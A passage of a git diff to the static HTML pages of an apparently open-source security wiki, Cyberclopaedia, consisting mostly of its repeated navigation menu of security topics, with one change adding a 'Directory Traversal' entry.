      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -289,22 +289,6 @@

Segment Flags - - diff --git a/docs/Reverse Engineering/Binary Formats/ELF/Symbols.html b/docs/Reverse Engineering/Binary Formats/ELF/Symbols.html index 54c490b8..eab0e676 100644 --- a/docs/Reverse Engineering/Binary Formats/ELF/Symbols.html +++ b/docs/Reverse Engineering/Binary Formats/ELF/Symbols.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -279,22 +279,6 @@

Symbol Vi - - diff --git a/docs/Reverse Engineering/Binary Formats/ELF/The ELF Header.html b/docs/Reverse Engineering/Binary Formats/ELF/The ELF Header.html index 7f7cb93f..2f09411e 100644 --- a/docs/Reverse Engineering/Binary Formats/ELF/The ELF Header.html +++ b/docs/Reverse Engineering/Binary Formats/ELF/The ELF Header.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
